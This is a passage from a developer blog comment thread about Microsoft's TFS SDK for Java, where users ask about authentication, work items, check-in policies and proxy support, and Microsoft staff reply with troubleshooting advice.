samplesconsole directory. Alternatively you might want to consider just shelling out to the TF version control command line. For TFVC you need to have a workspace in place to be able to download the source code. If you just wanted a quick read-only mirror of the source and you are talking to TFS 2013 or Visual Studio Online then you might want to take a look at how the "download as zip" call works in the browser to download a zip archive of a path from Version Control (in either TFVC or Git based projects). Good luck, Martin. Hi, One part of our cross-platform application (written in java) provides integration with several version control systems. Currently it supports integration with TFS "Server" workspaces by directly utilizing corresponding TFS Web Services. We also want to support "Local" workspaces, including its "offline" mode capability. So we can't just use TFS Web Services for all cases. Am I right that "TFS SDK for Java" is the way to go here (the only I believe documented way)? As I see it provides necessary api for performing corresponding "Local" workspaces tasks (like pendAdd()) and compatible with other clients (for instance, changes made by this sdk are correctly reflected in Visual Studio). What are your thoughts/recommendations? Thanks, Konstantin P.S. I guess we could also utilize "Team Explorer Everywhere" command-line client, but "TFS SDK for Java" seems to be more flexible here. Hi guys, I have a problem where I fail to connect a VS online server with the new SDK while the older version (10) succeeds to connect. I have already managed to connect and work with the new SDK to other VS systems (2010 and 2013 versions). Any advise what is wrong and how I can trouble-shoot this? Thanks @adi – can you send me more details about what APIs you are calling and how you are calling them? wismythe AT microsoft dot com. Will Smythe, Program Manager for TEE and the TFS Java SDK Hi Will, I am using the following code: Credentials tfsCredentials = new UsernamePasswordCredentials(username, password); ConnectionAdvisor connectionAdvisor = new DefaultConnectionAdvisor(Locale.US, TimeZone.getTimeZone("UTC")); connector = new TFSTeamProjectCollection(URIUtils.newURI(getCredentials().getUrl()), tfsCredentials, connectionAdvisor); connector.getAuthorizedTFSUser(); I suspect the issue is the server is VS online and the access is with LiveID, therefore I need to use a different auth approach. Any advise? Thanks Is it possible to print workitem State? i tried with your code its working fine but i need print the State column of workitem Great News Hi, How to Get the ListOfGroups, teams using Java SDK same like in C# API From IGroupSecurityService. pls. help me out. @Rajasekaran – use the Identity Management Service instead (com.microsoft.tfs.core.clients.webservices.IdentityManagementService2) Will Hi, tried using this on windows 8 platform but got into some errors. – Class not found – com.Microsoft.TFS.core.utility.Guidgen class. Can someone tell me how to fix this on eclipse platform?? @Nishant – I'm using this on Windows 8 (and indeed a preview build of Windows 10) with no problems. Do you want to try downloading the JAR file archive again and re-extracting as sometimes we've seen problems with the zip file getting corrupted during download. Email me (martinwo@microsoft.com) is that still doesn't fix things. hi, i want to get server's groups and team collection's groups. now i have get team collection's groups, but i can't get server's groups. Can you show me how to get it? Thanks @David – the TEE team is aware of your question and will respond via the TEE support forum. social.msdn.microsoft.com/…/how-to-get-servers-group-via-tfs-java-sdk Hi, Can you confirm if I need a TFS cal for an service account that is only used to enable Jenkins integration with TFS2013? Thanks @MR–the way to think about whether you need a TFS CAL is by asking "does the person whose action triggered the service account to do something have a TFS CAL?" The service account is simply performing an action based on a real person's action. If the real person has a TFS CAL, you're good. Could you please look through this thread? – social.msdn.microsoft.com/…/tfs-sdk-for-java-distributable-files-redisttxt Probably you could provide more details on the list of TFS SDK for Java distributable files. Can we use this API to update results against a test case in TFS? Hi Sujata, We don’t have test result APIs available in this SDK. Can I understand your scenario better and your target server version (Visual Studio Team Services or TFS 2013/2015) so that I can help you? Thanks, Manoj I’ve look into the Scenario 3 samples : com.microsoft.tfs.sdk.samples.checkinpolicy, and notice then when I go to Team Explorer (For Eclipse) -> Check-in Policies -> Add, it essentially fires the SamplePolicy() constructor (executed once). Then I go back to Cancel, Re-click Add, now SamplePolicy() gets fired twice, and repeat, 4 times etc… I output a log file within this constructor and can see this erratic behaviour. Could someone help ? @stan_chan, can you let us know which version of Eclipse and the Java SDK for TFS you’re using? Is the SDK version the one linked in this post (from 2011) or is it the recently open-sourced one at? It would also be useful to know which version of TFS you’re using. @Jeff Young, I’m using the following: – Eclipse Version: Mars.2 Release (4.5.2) – Team Foundation Server 2013 I took the SDK from this post. Is there an updated sdk built from GitHub (14.0.4) ? All I really need is the redist lib. Please advise. Do you have an email, I can correspond with? Hi Stan. You can find links to the latest downloads of TEE at. Also, you can contact me at jeyou at microsoft dot com. Has anyone experience “Memento exception” ? Initially, I didn’t get this issue. What happen was, I may have save save some strings by accident while developing my custom check-in policies using @Override public void saveConfiguration(final Memento configurationMemento){..}. Now, TEE v14.0.3 plug-in for eclipse keeps getting this error, when I click on “Check-in Policies”. Anyway to reset the Check-in Policies? Just an update to my previous post, turns out I’m storing $ (rootPath), which during serialization causes an error.. 2016-06-06 11:01:35,439 ERROR [ModalContext] (com.microsoft.tfs.core.memento.XMLMemento) Error reading) at com.microsoft.tfs.core.checkinpolicies.PolicyAnnotation.fromAnnotation(PolicyAnnotation.java:87)) 2016-06-06 11:01:35,444 ERROR [main] (com.microsoft.tfs.client.common.commands.vc.GetCheckinPoliciesCommand) Memento exception (Memento exception) com.microsoft.tfs.core.checkinpolicies.PolicySerializationException: Memento exception at com.microsoft.tfs.core.checkinpolicies.PolicyAnnotation.fromAnnotation(PolicyAnnotation.java:91)) Caused by: com.microsoft.tfs.core.memento.MementoException: com.ctc.wstx.exc.WstxUnexpectedCharException: Unexpected character ‘$’ (code 36) (expected a name start character) at [row,col {unknown-source}]: [1,1556] at com.microsoft.tfs.core.memento.XMLMemento.read(XMLMemento.java:117) at com.microsoft.tfs.core.checkinpolicies.PolicyAnnotation.fromAnnotation(PolicyAnnotation.java:87) … 6 more Caused by:) Anyway to reset? @stan_chan, can you please email me at “dastahel at ms dot com” so that we can help troubleshoot the problem? Here’s the latest update: Thanks to both @Jeff Young and @Alex R, I managed to solve the issue by clearing the policy using VersionControlClient.setCheckinPolicies(“$/projectName”,null); What causes this error was when I execute the command under the SamplePolicyCheckIn, safeConfiguration(..){ configurationMemento.putString(“someKey”,”$\”) <– This causes the error. Should be "/" } Perhaps add this checks during the serialization process.. (For the MS Folks). says “The version of httpclient currently used by the TFS SDK does not support proxy authentication.” When will this fundamental and critical functionality be fixed? @Andrew, Could you describe what you are trying to accomplish with the Java SDK? We want to make sure we support your scenarios, but we have to prioritize everyone’s needs. If you want to get others to vote up this feature request, please add it to our UserVoice site here:. Thanks, Jason @Andrew, after talking with Oli who owns the Jenkins code, I found out that the Java SDK does indeed handle proxy authentication correctly. If you are having trouble configuring it in your scenario, please reach out to us and we will try to help. StackOverflow is a good place to post these kinds of questions. Please tag your question with team-explorer-everywhere. Oli is going to update the comment on the Jenkins GitHub repo to indicate that we have added “Support for proxy servers requiring authentication” to our backlog for Jenkins. Thanks, Jason Is it possible to get the comments (that are written in VS and checked-in in TFS2015) into a Jira page by using this? @Doga could you please describe your scenario in a little more detail? I want to make sure I understand you correctly. When you say “comment” are you referring to a Git commit message and/or a TFVC check-in comment? Are you looking to use the Java SDK to get that comment and then push that comment to Jira? Thanks, -Leah @leantk Hi Leah, Sorry for late reply I didn’t get a notification. If you don’t get an answer from me in 1 day please send me an e-mail: isterdoga@hotmail.com. I appreciate your help. I meant TFVC check-in. Yes, I am looking to use Java SDK since Atlassian provides their plugin project in Java. Scenario is: 1) I opened a tab on my Jira called “My Tab” – it just works like other tabs. (Java) 2) I have TFS 2015, I wrote a TFS server-side plug-in to check if user uses tags like [Example] my comment [/Example] in their check-in otherwise the comment gets rejected. (C#) 3) This step is where I am stuck; I want to reach TFS to get the comment that are between [Example] [/Example] tags. When I click “My Tab” I want to see all the comments between these tags related to this issue(its subtasks are included). e.g. username submitted changeset #1 to 11/1/2016 5.35 PM [Example] My first comment [/Example] issue ID: 124 username2 submitted changeset #2 to 11/2/2016 10.30 AM [Example] My comment is the second one [/Example] issue ID: 124 username3 submitted changeset #65 to 11/2/2016 5.30 PM [Example] My comment is under the subtask, issue ID is different [/Example] issue ID: 125 Hi @Doga, You can use either VersionControlClient#queryHistory or VersionControlClient#queryHistoryIterator methods to get a changesets information from the server based on some criteria. Unfortunately, the TFS server does not provide the possibility to search changesets by comment. However, in your Java code you might specify some other relevant criteria to reduce the number of returned changesets and filter results by comments. For example, it seems to me that you might specify the date (maybe -1d) when the JIRA item was created as the versionFrom parameter in the call and the date when the issue was closed (if any) as versionTo. Alex
https://blogs.msdn.microsoft.com/bharry/2011/05/16/announcing-a-java-sdk-for-tfs/
CC-MAIN-2016-50
refinedweb
4,115
65.12
dotCover Features dotCover is a .NET unit testing and code coverage tool that works right in Visual Studio, helps you know to what extent your code is covered with unit tests, provides great ways to visualize code coverage, and is Continuous Integration ready. dotCover calculates and reports statement-level code coverage in applications targeting .NET Framework, Silverlight, and .NET Core. Integration with Visual Studio dotCover is a plug-in to Visual Studio, giving you the advantage of analyzing and visualizing code coverage without leaving the code editor. This includes running unit tests and analyzing coverage results in Visual Studio, as well as support for different color themes, new icons and menus. dotCover supports Visual Studio 2010, 2012, 2013, 2015, and 2017. Running and managing unit tests dotCover comes bundled with a unit test runner that it shares with another JetBrains tool for .NET developers, ReSharper. The runner works in Visual Studio, allows managing unit tests through sessions, and supports multiple unit testing frameworks, namely MSTest, NUnit, xUnit (all out of the box) and MSpec (via a plug-in). Continuous testing dotCover supports introduces continuous testing: a modern unit testing workflow whereby dotCover figures out on-the-fly which unit tests are affected by your latest code changes, and automatically re-runs the affected tests for you. Based on your preferences,_2<< Unit test coverage A major use case of dotCover is analyzing unit test Next to unit test run results, dotCover displays a coverage tree showing how thoroughly a particular project, namespace, type, or type member is covered with unit tests. - Marker highlighting - Colored background highlighting Coverage highlighting in Visual Studio To visualize coverage data, dotCover can highlight lines of code right in Visual Studio code editor. There's an option to switch between highlighting markers and colored background or to display both. Note that highlighting shows not only covered and uncovered code but the results of the covering unit tests as well. Green color means that tests pass while red color indicates that at least one test that covers the statement fails. Grey color shows uncovered code. Navigation to covering tests dotCover provides a command (and a keyboard shortcut) to detect which tests cover a particular location in code, be it a class, method, or property. You can invoke the command from Visual Studio text editor or from dotCover's Coverage Tree view. You can navigate from a pop-up that lists covering tests to any of these tests. Additionally, you can instantly run them or add to an existing unit test session. Hot Spots view The Hot Spots view was designed to help you identify the most risky methods in your solution. Hot Spots are calculated in terms of high cyclomatic complexity and low unit test coverage of the methods. Remote code coverage You can run coverage analysis of unit tests on a remote machine and have results served back to your local computer. As soon as you start coverage analysis, dotCover sends binaries and the list of tests to be executed to a remote server. All calculations are executed by the server, and the coverage snapshot is then sent back to your machine. You can then examine coverage results in the same way you do following a local coverage run. Coverage filters. Excluding nodes from coverage tree As an alternative to filters that you set up in advance or that you apply to any solutions you open, you can exclude items from coverage results as you work with them. When you already have coverage data collected, you can choose to exclude a specific node from the coverage tree (and optionally create a permanent coverage filter).. . Coverage analysis as part of Continuous Integration coverage analysis engine is bundled with into a free version of TeamCity, which helps schedule coverage runs as part of Continuous Integration process and generate server-side coverage reports. TeamCity understands the output of dotCover console runner and highlights its errors and warnings in the build log.
http://www.jetbrains.com/dotcover/features/index.html?linklogos
CC-MAIN-2017-43
refinedweb
662
50.16
Within the api directory of your projects, ZEIT Now will automatically recognise the languages listed on this page, through their file extensions, and serve them as serverless function. Supported Languages: Node.js File Extensions: .js, .ts Default Runtime Version: 8.10.x (or defined) Node.js files through a JavaScript file or a TypeScript file within the api directory, containing a default exported function, will be served as a serverless function. For example, the following would live in api/name.js: module.exports = (req, res) => { const { name = 'World' } = req.query res.status(200).send(`Hello ${name}!`) } An example Node.js function that receives a name query and returns a greeting string. Example deployment: The serverless function with the name query parameter using Node.js to change the name. Node.js TypeScript support: Deploying a Node.js function with the .ts extension will automatically be recognized as a TypeScript file and compiled to a serverless function. As an example; a file called name.ts in the api directory, and importing types for the Now platform Request and Response objects from the @now/node module: import { NowRequest, NowResponse } from '@now/node' export default (request: NowRequest, response: NowResponse) => { const { name = 'World' } = request.query response.status(200).send(`Hello ${name}!`) } An example TypeScript Node.js function that receives a name query and returns a greeting string. Example deployment: You can install the @now/node module for type definitions through npm: npm i -D @now/node Installing the @now/node module for Type definitions of NowRequest and NowResponse You can also define a tsconfig.json to configure the Now TypeScript compiler: { "compilerOptions": { "module": "commonjs", "target": "esnext", "sourceMap": true, "strict": true } } An example tsconfig.json file. Node.js Request and Response Objects For each request of a Node.js serverless function, two objects, request and response, are passed to it. These objects are the standard HTTP request and response objects given and used by Node.js, but they include extended helpers provided by Now: Node.js Helpers The following function using the req.query, req.cookies and req.body helpers. It returns greetings for the user specified using req.send(). function using the req.body helper that returns pong when you send ping. Node.js Async Support ZEIT Now supports asynchronous functions out-of-the-box. In this example, we use the package asciify-image to create ascii art from a person's avatar on GitHub. First, we need to install the package: npm i --save. Node.js Dependency Installation The installation of dependencies behaves as follows: - If a package-lock.jsonis present, npm installis used - Otherwise, yarnis used. Defined Node.js Version The Node.js version, though defaulted to 8.10.x, can be changed to 10.x by defining engines in package.json: { "name": "my-app", "engines": { "node": "10.x" } } Defining the 10.x Node.js version in a package.json. Go File Extension: .go Default Runtime Version: Go 1.x Go files within the api directory, containing a singular exported function integrated with the net/http Go API, will be served as a serverless function. For example, the following would live in api/date.go: package handler import ( "fmt" "net/http" "time" ) func Handler(w http.ResponseWriter, r *http.Request) { currentTime := time.Now().Format(time.RFC850) fmt.Fprintf(w, currentTime) } An example Go function that returns the current date. net/httpAPI. When deployed, the example function above will be served as a serverless function, returning the latest date. See it live with the following link: Private Packages for Go To install private packages with go get, define GIT_CREDENTIALS as a build environment variable. All major Git providers are supported including GitHub, GitLab, Bitbucket, as well as a self-hosted Git server. With GitHub, you will need to create a personal token with permission to access your private repository. { "build": { "env": { "GIT_CREDENTIALS": "" } } } An example build environment variable using a GitHub personal token for Private Go Packages. Python File Extension: .py Default Runtime Version: Python 3.6 Python files within the api directory, containing an handler variable that inherits from the BaseHTTPRequestHandler class or an app variable that exposes a WSGI or ASGI application, will be served as a serverless function. For example, the following would live in api/date.py: An example Python function that returns the current date. When deployed, the example function above will be served as a serverless function, returning the current date and time. See it live with the following link: Python Dependencies ZEIT Now supports installing dependencies for Python defined in the requirements.txt file or a Pipfile.lock file at the root of the project. Related For more information on what to do next, we recommend the following articles: Serverless Functions For more information on how to get started with Serverless Functions on Now and how you can develop them further, read the serverless functions introduction.
https://zeit.co/docs/v2/serverless-functions/supported-languages/
CC-MAIN-2019-35
refinedweb
808
51.65
This is your resource to discuss support topics with your peers, and learn from each other. 06-08-2012 10:38 AM - edited 06-08-2012 10:39 AM Hi every one, Please help me i want to load customize font "Calibri.TTF" , but it is not working my code is given .... FontFamily family=null; if (FontManager.getInstance().load("CalibriBold.TTF", "MyFont11", FontManager.APPLICATION_FONT) == FontManager.SUCCESS) { try { family = FontFamily.forName("MyFont11"); } catch (ClassNotFoundException e) { try{ family=FontFamily.forName(FontFamily.FAMILY_SYSTEM ); }catch(Exception ex){} } }); }catch(Exception ex){} } } Plese tell me what is problem with this Solved! Go to Solution. 06-11-2012 09:00 AM Which NDK? Which FontManager are you using? (which namespace) Did you test the != FontManager.SUCCESS case? What has your debugginng shown so far? Stuart 06-13-2012 03:40 PM This is Java? The most likely explanation is that it can't find the font file. Check examples on how to reference the font directories. Did you try handling the != SUCCESS case to see if it found the error, and if not what the reason is? Stuart 06-14-2012 12:46 AM Hi Stuart, It is java , FontManager is class which is given in BlackBerry API 5.0.0 & above , net.rim.device.api.ui.FontManager, but it is not working i dont know why 06-14-2012 09:07 AM You'll excuse me for having had my head in C++ I hope Can you check which line fails and what the error is? Rule out the usual issue that the file is not in the directory or path that the routine is looking in. Stuart 06-14-2012 10:30 AM 06-22-2012 01:26 PM Did you solve your issue? If it was one of our answers, please mark them as solution, else for others with similar questions in the future please post your solution and mark it as solution. Otherwise, can you provide us with where the code fails? Stuart 06-22-2012 01:29 PM Err... can we move this post to the right forum? I'm subscribed to the forum, and I got an e-mail about this, came here thinking I could provide help. I'm not a Java dev, so I cannot. Slightly annoying. 06-25-2012 02:20 PM 06-26-2012 12:46 AM soryy i was busy to complete my project. so i could not give you response , yes i got soloution , my code is working fine , sure i should be moved in right forum.
http://supportforums.blackberry.com/t5/Java-Development/Custom-Font-Problem/m-p/1784993
CC-MAIN-2015-11
refinedweb
422
68.16
This is my first article on CodeProject. Sorry for my poor English. The reason I think it might be helpful that I share this HMAC-SHA1 class is because I found no related source I could refer to. This is a simple C++ class of HMAC-SHA1 with only single byte character support. You could add double bytes character support if needed. You will find this class contains only a function HMAC_SHA1 that accept test input and hash key, then generates a digest. HMAC-SHA1 HMAC_SHA1 Thanks to Dominik Reichl, the SHA1 class I wrapped is from his amazing class. I simply implemented the HMAC algorithm on it. For MD5, you could refer to RFC. There is a detailed programming flow of it. The usage of this class is extremely simple. Declare CHMAC_SHA1, call its HMAC_SHA1 function. That's it! CHMAC_SHA1 You may use HMAC-SHA1 in RFC 2202 test case to verify your implementation. Following is test case 1 in RFC 2202. #include "HMAC_SHA1.h" BYTE Key[20] ; BYTE digest[20] ; unsigned char *test = "Hi There" ; memset(Key, 0x0b, 20) ; CHMAC_SHA1 HMAC_SHA1 ; HMAC_SHA1.HMAC_SHA1(test, strlen(test), Key, sizeof(Key), digest) ; // Check with digest equal to 0xb617318655057264e28bc0b6fb378c8ef146be00 // or not This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) General News Suggestion Question Bug Answer Joke Rant Admin Math Primers for Programmers
http://www.codeproject.com/Articles/22118/C-Class-Implementation-of-HMAC-SHA?fid=939365&df=90&mpp=10&noise=1&prof=True&sort=Position&view=Expanded&spc=None
CC-MAIN-2013-20
refinedweb
232
74.49
You can subscribe to this list here. Showing 22 results of 22 Is there any This seems to be a typo in the source, might want to check if it is in the development The new 1.2 documentation says that appending YAML streams with a "..." line inserted between them should always work to append them. Unfortunately this is not true if the second document is an implicit one (ie it has no "---" line). It appears this is literally what the specification says, and also libyaml does complain about the following text where two trivial implicit documents are appended with a "...": doc1 ... doc2 The following patch (against libyaml-stable branch) fixes it but also makes it not require a "---" after a % directive, this may also be a desirable fix: Index: src/parser.c =================================================================== --- src/parser.c (revision 369) +++ src/parser.c (working copy) @@ -392,18 +392,17 @@ token = PEEK_TOKEN(parser); if (!token) goto error; if (token->type != YAML_DOCUMENT_START_TOKEN) { - yaml_parser_set_parser_error(parser, - "did not find expected <document start>", token->start_mark); - goto error; + end_mark = start_mark; + } else { + end_mark = token->end_mark; } if (!PUSH(parser, parser->states, YAML_PARSE_DOCUMENT_END_STATE)) goto error; parser->state = YAML_PARSE_DOCUMENT_CONTENT_STATE; - end_mark = token->end_mark; DOCUMENT_START_EVENT_INIT(*event, version_directive, tag_directives.start, tag_directives.end, 0, start_mark, end_mark); version_directive = NULL; tag_directives.start = tag_directives.end = NULL; return On 10.12.2009, at 13:52, Andrey Somov wrote: >> >>. I am against declaring "best" implementation. I am for providing comparison-table. as detailed as possible. > >. - Andrey On 10.12.2009, at 12:45, Andrey Somov wrote: >. I do not see the reason to make java special in any way. Probably, it would be a better idea to provide comparison table for all known implementations? (grouped by language) Hi all, at the moment yaml.org mentions four YAML parsers for Java. It means that developers have to try a few to find out which one matches the task. Of course if one tries to parse a "hello world" file then all the parsers work. But once the complexity grows then the parsers clearly show their peculiarities. JYaml has the weakest parser. Sometimes developers even want to compensate JYaml limitations asking to change other (properly working!) parsers: But Google puts JYaml on top when one searches for "java yaml". JvYaml and YamlBeans do not implement complete 1.1 specification but it is not mentioned anywhere on their web-site. Sometimes developer's investigation may result in a misleading conclusion. Like it happened here: where the developer reports a failure for one parser (with one line of code) and success for another parser (with a lot of configuration code). I think developers often do not have enough time to make an accurate estimation. And the community should help here. Also I clearly see the advantage that Python has only one standard parser. It means that the whole Python community improves the single code base and it makes PyYAML very stable and feature rich. I would like to propose to indicate the recommended parser for Java on yaml.org. P.S. I have already tried to compare available Java parsers: - Andrey On Wed, Dec 9, 2009 at 8:34 PM, Osamu TAKEUCHI <osamu@...> wrote: > Oren, > > This is a reminder. > I think this issue must be corrected in the next fix. > Hmmm.... I'll look into this before the next set of patches. Thanks, Oren Ben-Kiki On Wed, Dec 9, 2009 at 12:47 PM, Burt Harris <Burt.Harris@...>wrote: >. > Yes. There was an inherent ambiguity in YAML 1.1 and the 1.2 spec corrected this. Files such as these you have listed are indeed "bad". And one of them is a right hand side of a 1.2 example, too... Yet another typo to fix. Thanks for catching that! Have fun. Oren Ben-Kiki On Wed, Dec 9, 2009 at 10:42 AM, Burt Harris <Burt.Harris@...>wrote: > Using the examples from the Yaml 1.2 spec, as unit tests for my > implementation has turned up a number of minor issues: > > > Awesome! It seems it is time to consider another round of fixing typos... I'm going to wait until Clark expresses an opinion about the equality issue, though. He has a new baby so this might take a while, though :-) Have fun, Oren Ben-Kiki On Wed, Dec 9, 2009 at 11:06 AM, Burt Harris <Burt.Harris@...>wrote: >? > Yes. This is due to the fact that JSON does not consider these to be line breaks. To make YAML to be a superset of JSON, we had no choice but to make this change. We figured that this shouldn't affect (most) every files out there in the. ** > Yes. Thanks for catching this. Have fun, Oren Ben-Kiki. Example 9.3 from the 1.2 specification: %YAML 1.2 --- !!str "Bare document" %YAML 1.2 --- !!str "%!PS-Adobe-2.0\n" Example 7.9 the 1.1 specification: %YAML 1.1 --- !!str "foo" %YAML 1.1 --- !!str "bar" %YAML 1.1 --- !!str "baz" Example 7.13 from the 1.1 specification: ! "First document" --- !foo "No directives" %TAG ! !foo --- !bar "With directives" %YAML 1.1 --- !baz "Reset settings". Thanks for all your work on the new specification. It rocks. Using the examples from the Yaml 1.2 spec, as unit tests for my implementation has turned up a number of minor issues: I think all of the issues in the first (Yaml 1.2) section these represent typos in the spec's examples rather than problems with the meaning of the specification or other problems in my implementation. Those listed at the bottom, as Yaml 1.1 spec issues are old, and may reflect problems with my understanding of the language at the time, I leave them there for reference only. I was reading the YAML specification recently, and I noticed the section "1.3. Relation with JSON", which talked about a serialization format "YSON" between YAML and JSON. I realized this was exactly what I had been designing in my spare time for the past year or so, and so I thought I would share my thoughts on the matter. I'm designing a programming language called Droscript, and a serialization format called DSON (Droscript object notation), which can be described as tagged JSON, or cononical YAML, which ever suits your fancy. In short, roughly speaking: JSON < DSON < YAML. The purpose behind DSON as a serialization format is to have a common format which is: - an RDF encoding, and - an OpenMath encoding. A DSON Value can be one of: Array, Object, Number, String, Symbol, or Typed. A 'Symbol' can be either a Name or a URI. A Typed Value is expressed in a subset of YAML used for tags, so for example: !<> [22, 7] represents the rational number 22/7. The detailed grammar for the differences between DSON and JSON is: Start : ('@let' Object)* Value* Value : Array Object Number String Symbol # includes 'true', 'false', 'null'. Typed Pair : String ': ' Value Symbol ': ' Value ... # rest of JSON Syntax Typed : '!' String Value '!' Symbol Value Symbol : Name ':' Name ':' Name # for OMCD namespaces < \1 / \3 # \5 > Name ':' Name # for XML namespaces < \1 # \3 > Name # for RDF blank nodes < # \1 > URI # lexical Name : [A-Za-z-][0-9A-Za-z-]* URI : '<' URIContent '>' The detailed differences, making (DSON != YAML), are - 'Typed' values can be tagged by 'String's, - 'Name's are namespaced with ':' and not '!', - 'Name's cannot start with a number, and - 'Pair's can be keyed by 'URI's. DSON is an RDF encoding in that an RDF graph can be represented as !triples [ [<>, <>, <>] ] which would stand for the Turtle syntax "rdf:_1 rdfs:subPropertyOf rdfs:member ." . Also, the common idiom of expressing typed values in RDF is "value^^typeURI", which can of course be written as "!typeURI value" in DSON. DSON is an OpenMath encoding in that an OM object can be expressed as (the axiom of the empty set) !<> [<>, x, !<> [<>, y, !<> [<>, y, x] ] ] I also been considering a new directive would make the whole Name/URI thing easier in the long run: @let { om: <>, mml: <>, notin: <> } !mml:bind [om:quant1:exists, x, !mml:bind [om:quant1:forall, y, !mml:apply [notin, y, x] ] ] would be equivalent to the example above (axiom of the empty set). In this sense, the @let directive combines both (&, *) anchor notations in YAML, and the %TAG directive at the same time. It also provides a way to define XML and RDF namespaces. XML namespaces are tricky, though, since the phrase 'm:apply' doesn't map to a URI, but a pair (mmlns, "apply"), so this does not encode XML namespaces exactly. However, since QName is a type, one could encode a QName as: "!qname [ns, local]". Also, each key in the first (and only) parameter of @let (an object) would have to be a 'Name' in order for @let to work properly. In these examples, all the tags after '!' have been URIs, but they could just have easily been Names, for example, if a DSON processor is also an OpenMath/MathML processor, then !bind can be assumed to mean the obvious thing, just as !apply can be assumed to mean the obvious as well. Perhaps there could be some default bindings, or something, so that some prefixes can be omitted if defaults are used. For example, one could require that there is an implicit directive before every DSON file: @let { null: <tag:yaml.org,2002:null>, true: <>, false: <> } or the like, to ensure that these three symbols are not redefined by further @let directives. Overall, it seems to be quite an expressive format for having such a modest extension to JSON, but all the URIs might be a little much. In hindsight, a similar purpose could be achieved without 'Symbol's at all, making typed/tagged values reduce to '!' String Value which would _still_ be incompatible with YAML. I suppose what I'm asking is: does anyone have any recommendations on how to use YAML for these purposes, or any ideas how to make DSON as compatible as possible with YAML? Regards, Andrew Robbins Sounds good to me. On Tue, Dec 1, 2009 at 8:26 AM, Andrey Somov <py4fun@...> wrote: > > > > ------------------------------------------------------------------------------ > Join us December 9, 2009 for the Red Hat Virtual Experience, > a free event focused on virtualization and cloud computing. > Attend in-depth sessions from your desk. Your couch. Anywhere. > > _______________________________________________ > Yaml-core mailing list > Yaml-core@... > > Note that my original comments are still true. The parser does not care if there is a newline at the end and "fails" even if the newline is there: libyaml if told to write only a scaler of "" will produce a file consisting of a single newline. If told to read this it will return nothing. Removing the newline (and also adding any number of extra newlines) does not make a difference. Recommended fix is to add logic so that if the very last thing in the file is a "" scalar that libyaml somehow modifies the output, such as by forcing the --- trailing text. I absolutly agree with the trailing newline being optional! Osamu TAKEUCHI wrote: > I read that Oren modified the spec in YAML 1.2 to accept an input without > a line break at the end of the stream merely for JSON compatibility. > I thought that YAML 1.1 spec refused such an input not accidentally but > intentionally. > > > > Anyway, as I wrote, I don't think so, too, except for the reference > parser. ;p > > >>> According to the spec, this change was done for JSON compatibility. >>> A YAML 1.2 processor seems to be required to construct a null object >>> from an empty node. >>> >>> In this point, YAML 1.2 is completely incompatible from YAML 1.1. >>> Please compare example 7.3 in YAML 1.2 spec with example 8.13 in YAML >>> 1.1 spec. >>> >> I don't think it's the correct interpretation of the spec. I'd say that >> YAML 1.2 provide a recommended scheme for tag resolution, while YAML 1.1 >> doesn't, leaving the decision of choosing the default scheme to the >> processor authors. I believe all existing YAML producers interpret an >> empty plain scalar as a null value unless instructed otherwise. > > Fmm, I didn't know that. > > I don't understand how we can interprete YAML 1.1 spec as you wrote > with provided example 8.13 and 8.15, but if only I misinterpreted > the spec, I'm happier to hear that. I was affraid to have the > possible incompatibility between YAML 1.1 and 1.2. > >@... > In the majority of systems that would consider a key of 1 and a key of 1.0 equal, they will also have the limit that a key of "blah" is not allowed. But I don't see YAML being designed to somehow define the set of legal keys, so it seems defining this equality is also outside YAML's scope. Also there are far more complex problems than int vs float: a system using 32-bit floats will consider a lot of numeric keys equal that a 64-bit float system will consider unequal. I think it would be impossible for YAML to define this and nobody would obey any such defined rules. I would vote for rule 4. To make a YAML processor practical, we do need something to hash to build a table. Therefore I agree with the rule that equal tags and equal content are guaranteed to be equal. It is not clear when two literals are equal however, I certainly consider "false" and false to be unequal. Rather than requiring all YAML processors to understand all possible automatic tagging rules I would add "is it quoted" to the data that says literals are unequal. I'm unclear on whether this is already how you are defining it. In addition I would agree with the majority here that the order of keys should not make maps unequal, and multiple equal keys are considered equal to a map where all except the last one have been deleted. Without this it is probably impossible to do any complex yaml processing. > 4. Do not specify YAML equality rules. Eliminate most of the discussion > of equality, canonical formats etc. and replace it by a stating that > implementations "may" reject mappings that have "equal" keys, according > to their own *implementation-specific* definition of equality. Constrain > this to say that nodes with equal tags and equal content are always > equal and hence "must" be rejected as duplicates. The problem here is > that { 1: "int", "1" : "string" } would work in Python and not in > Javascript. Arguably, anyone defining a cross-platform schema would be > able to "easily" avoid such issues (e.g., by requiring all keys of the > mapping to have the same tag, which is pretty trivial). But there's no > longer a universal cross-platform validity guarantee. This is a really great discussion about equality, and I'd like to add my take from the static language/no reflection side of things (I run yaml-cpp, a C++ implementation). Since C++ has no reflection, YAML's typing can *only* be for the user (we can't use it to construct an object). So yaml-cpp allows users to inspect YAML nodes and deconstruct them according to their individual application needs. To inspect maps, we have two options: first, we can iterate through the nodes: for(YAML::Iterator it=node.begin();it!=node.end();++it) { // it.first() represents the key // it.second() represents the value } which just treats a map as a sequence of key/value pairs (so there's no need to worry about equality or duplicate nodes). On the other hand, we can find a value by key: node["foo"]; Internally, we just iterate through the keys until we find a key that equals "foo", which is obviously where equality comes in. In this case, yaml-cpp defers to the user about equality of nodes. If you ask for node["foo"], you'll get equality of strings (which is probably what you want). But you can also define your own types struct Foo { ... }; bool operator == (const Foo&, const Foo&) { ... } and then ask for Foo foo = ...; node[foo]; in which case you get to define equality yourself. I feel that this is the right choice, both for yaml-cpp and YAML in general. This is essentially Oren's possibility #4, but I'd love to be there (not dragged kicking and screaming :). In short: Mappings are (unordered) sequences of key/value pairs. YAML makes no comment about when nodes are equal - it's up to the implementation and the application to make semantic sense of the data. Implementations are allowed to decree that some nodes are equal, and allowed to pass on the rest to the application. I think the problem is that YAML is trying to tackle equality at all. Fundamentally, equality depends on purpose. (Kirill gave some good examples of this.) Tags, I think, are a red herring here. Just because YAML knows that a node is tagged !foo doesn't mean that it has any idea when two foos are equal. For that, only the application knows, so the decision should be deferred. Thanks, Jesse On Sun, Nov 29, 2009 at 8:53 PM, Osamu TAKEUCHI <osamu@...> wrote: > Oren, > >> I do not find very much importance to keep an arbitrary YAML file to >> be acceptable to every implementation. Each YAML file must have its >> own purpose. So, I expect no chance where one would like to feed the >> YAML file in my example to any YAML implimentation that do not have >> reference-based object model. >> >> >> Well, that's where we differ. >> >> YAML's goal 2 (portability) has higher priority than goal 3 (matching >> native data structures). That is, wo do see the point in being able to >> create generic "schema-blind" YAML tools, having a well-defined >> consistent YAML data model, and so on. I can see why someone only >> interested in a particular application (or implementation) may disagree; >> someone interested in generic tools and portability would agree. It is a >> matter of priorities; had we flipped the order of the 